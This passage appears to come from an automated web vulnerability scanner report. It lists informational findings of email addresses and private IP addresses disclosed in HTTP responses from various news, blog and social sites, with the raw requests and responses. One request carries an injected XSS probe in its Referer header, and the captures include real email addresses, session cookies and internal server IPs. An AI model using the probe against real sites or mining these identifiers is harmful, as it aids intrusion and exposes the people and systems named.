Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: orangeorb.blogspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=17729b14830bec26; HttpOnly
Expires: Thu, 12 May 2011 13:32:05 GMT
Date: Thu, 12 May 2011 13:32:05 GMT
Cache-Control: private
Last-Modified: Thu, 12 May 2011 02:55:21 GMT
ETag: "4620d68b-a3e9-47d6-9e38-877ac81cebcb"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 155467

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...
<div class='widget-content'>
rlee@orangeorb.net
</div>
...[SNIP]...
16.10. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orangeorb.blogspot.com
Path:   /2011/05/planets-align-on-friday-13th-and.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/planets-align-on-friday-13th-and.html?action=backlinks&widgetId=Blog1&widgetType=Blog&responseType=js&postID=4131104281685867304 HTTP/1.1
Host: orangeorb.blogspot.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=5458c72-12fe4671013-14c4845f-1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 12 May 2011 13:33:20 GMT
Expires: Thu, 12 May 2011 13:33:20 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 1844

try {
_WidgetManager._HandleControllerResult('Blog1', 'backlinks','\74a name\75\47links\47\76\74/a\76\74h4\76Links to this post\74/h4\76\n\74dl class\75\47comments-block\47 id\75\47comments-block\47\7
...[SNIP]...
ynchronicity. 0 comments: Post a Comment \46middot; Older Post Home \74b\76...\74/b\76 \n\74/dd\76\n\74dd class\75\47comment-footer collapseable\47\76\n\74span class\75\47comment-author\47\76Posted by\nlesleyinnm@gmail.com (lesley)\74/span\76\n\74span class\75\47comment-timestamp\47\76at\nMay 12, 2011 4:01 AM\74/span\76\n\74/dd\76\n\74/div\76\n\74/dl\76\n\74p class\75\47comment-footer\47\76\n\74a class\75\47comment-link
...[SNIP]...
16.11. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gizmodo.com.au
Path:   /2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/ HTTP/1.1
Host: www.gizmodo.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:18 GMT
Server: Apache
Last-Modified: Thu, 12 May 2011 13:19:32 GMT
ETag: "6aa380-84a4-4a3140a296100;4a2fc60d6f0c0"
Accept-Ranges: bytes
Cache-Control: max-age=3, must-revalidate
Expires: Thu, 12 May 2011 13:28:21 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>

...[SNIP]...
<a href="mailto:tips@gizmodo.com.au">
...[SNIP]...
16.12. http://www.greenfieldreporter.com/assets/scripts/menu/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenfieldreporter.com
Path:   /assets/scripts/menu/menu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/scripts/menu/menu.js HTTP/1.1
Host: www.greenfieldreporter.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=c7053afee9bb783895611dfb497d343c

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Mon, 20 Sep 2010 14:05:32 GMT
ETag: "cc0172-3316-490b1693c1900"
Accept-Ranges: bytes
Content-Length: 13078
Content-Type: application/javascript

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation for
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
16.13. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.h-online.com
Path:   /open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

Issue detail

The following email address was disclosed in the response:

Request

GET /open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html HTTP/1.1
Host: www.h-online.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>


<meta http-
...[SNIP]...
<a href="mailto:djwm@h-online.com" class="noline" title="Dj Walker-Morgan">
...[SNIP]...
16.14. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/ HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:57 GMT
Server: Apache
Last-Modified: Thu, 12 May 2011 08:33:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=300, must-revalidate
Expires: Thu, 12 May 2011 13:36:57 GMT
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 68093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<a href="mailto:info@milehighonthecheap.com">info@milehighonthecheap.com</a>
...[SNIP]...
16.15. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milehighonthecheap.com
Path:   /wp-content/themes/atahualpa353/images/favicon/cities.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/atahualpa353/images/favicon/cities.ico HTTP/1.1
Host: www.milehighonthecheap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anti-captcha-crc=1a4fa4a4438895652eab32279365c62b77fc9add; __utmz=143899945.1305207063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2032681215-1305207070993; __utma=143899945.1163999256.1305207063.1305207063.1305207063.1; __utmc=143899945; __utmb=143899945.2.10.1305207063

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:34:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,Cookie
X-Pingback: http://www.milehighonthecheap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1305207252+173.193.214.243; path=/
Last-Modified: Thu, 12 May 2011 13:34:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 60966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<a href="mailto:info@milehighonthecheap.com">info@milehighonthecheap.com</a>
...[SNIP]...
16.16. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysuburbanlife.com
Path:   /lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th HTTP/1.1
Host: www.mysuburbanlife.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:45 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1200
Age: 309
X-Cache: HIT from parent1.ghm.zope.net
X-Cache: MISS from cache2.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close
Content-Length: 46266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<![CDATA[
                       var abuse_email = 'jschuler@mysuburbanlife.com, akrosel@mysuburbanlife.com';
                       var com_page ='/!/commenting/comments/z4m|urn:uuid:ef6205cd-3e6f-4bf4-8165-c2986dc63fd7';
                       var abuse_title = 'To do tonight: Watch \'American Idol\'; "Priest" opens Friday the 13th - Lyo
...[SNIP]...
16.17. http://www.pcworld.com/pcworldconnect/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/a

Issue detail

The following email address was disclosed in the response:

Request

GET /pcworldconnect/a HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/pcworldconnect/comment_registration?callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html125d0%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0753613c8b936b7cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmc=205278865; __utmb=205278865; pcw.last_uri=/blogs/id%2C61/bizfeed.html; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.s={"v":1,"rid":"1305207028351_313644","ru":"http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html","r":"www.pcworld.com","st":"","to":3,"c":"http://www.pcworld.com/blogs/id,61/bizfeed.html","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; JSESSIONID=37DBA5BF4885B3CA496B7FAFE45B1DC7

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:34:16 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/html
Set-Cookie: JSESSIONID=19BC2B8DD4812239B8000851DD33F530; Path=/
Vary: Accept-Encoding
Content-Length: 4215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto:webmaster@pcworld.com">
...[SNIP]...
16.18. http://www.pubmatic.com/category/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pubmatic.com
Path:   /category/blog

Issue detail

The following email address was disclosed in the response:

Request

GET /category/blog HTTP/1.1
Host: www.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/networks-exchanges/overview
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.2.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:35 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
X-Pingback: http://www.pubmatic.com/xmlrpc.php
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a onclick="javascript:pageTracker._trackPageview('/mailto/Gianlcua.Carrera@PubMatic.com');" href="mailto:Gianlcua.Carrera@PubMatic.com">Gianlcua.Carrera@PubMatic.com</a>
...[SNIP]...
16.19. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.warnerbros.com
Path:   /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

Issue detail

The following email address was disclosed in the response:

Request

GET /all/us/omniture/s_code_wbrostheatricaldomesticdvd.js HTTP/1.1
Host: www2.warnerbros.com
Proxy-Connection: keep-alive
Referer: http://www.fridaythe13thmovie.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:05 GMT
Server: Apache
Set-cookie: WBWTID=173.193.214.243-4DCBE11918E0000209F5816-www2-wwwintl-web08; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Thu, 01 Oct 2009 17:56:44 GMT
ETag: "74522-64b3-5ed10f00"
Accept-Ranges: bytes
Content-Length: 25779
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="wbrostheatricaldomesticdvd"
var s=s_gi(s_account)
/****
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...
17. Private IP addresses disclosed  previous  next
There are 77 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

17.1. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/10042561111.528147018.1934312001.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /badge/10042561111.528147018.1934312001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qo83J; path=/; domain=.facebook.com
X-FB-Server: 10.144.22.108
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
17.2. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/111279988891248.528147018.678371001.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /badge/111279988891248.528147018.678371001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=v7n-W; path=/; domain=.facebook.com
X-FB-Server: 10.144.54.120
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
17.3. http://crenk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925; bp-activity-oldestpage=1; bsau=13052069471010961856; bsas=13052069471019356657; PHPSESSID=uhmmla1416obel17op5q4k8u00

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 04 Mar 2011 07:47:07 GMT
Content-Length: 3638
Date: Thu, 12 May 2011 13:31:38 GMT
X-Varnish: 2341019626 2340990215
Age: 148
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

..............h...&... ..............(....... ...........@...........................SP......%!......~z..0.......BJ......aU......o{......!!......rf......c]......*1..........QK......km..UY............
...[SNIP]...
17.4. http://crenk.com/wp-content/plugins/buddypress-share-it/img/buzz.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress-share-it/img/buzz.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress-share-it/img/buzz.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:16:06 GMT
Content-Length: 2007
Date: Thu, 12 May 2011 13:29:18 GMT
X-Varnish: 2340991787 2340948111
Age: 224
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...7.........).......tEXtSoftware.Adobe ImageReadyq.e<...yIDATx..X.sTW....7.Iv7$)6..H.a...f..
E!..Ru.E..2S.Xu.:R.*8T..8..`......m.U...tH..l.ix.D.&..#,.&.d_.q...w.=7...Ln..;.|.....~'..m
...[SNIP]...
17.5. http://crenk.com/wp-content/plugins/buddypress-share-it/img/digg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress-share-it/img/digg.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress-share-it/img/digg.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; __qca=P0-615196791-1305206924675; __utmz=227413711.1305206925.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=227413711.1952451200.1305206925.1305206925.1305206925.1; __utmc=227413711; __utmb=227413711.1.10.1305206925

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Apr 2011 15:16:06 GMT
Content-Length: 1852
Date: Thu, 12 May 2011 13:29:18 GMT
X-Varnish: 2340991793 2340948122
Age: 224
Connection: keep-alive
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

.PNG
.
...IHDR...7.........).......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..XKL.U.....@.. .X)....:Cl
.%..MmZm.Em...F...]...np.m.-,..R]...&m...\..P...*..5.....>..K......{...s.w.?,.9F~.R._z.....
...[SNIP]...
17.6. http://crenk.com/wp-content/plugins/buddypress-share-it/img/email.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crenk.com
Path:   /wp-content/plugins/buddypress-share-it/img/email.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wp-content/plugins/buddypress-share-it/img/email.png HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
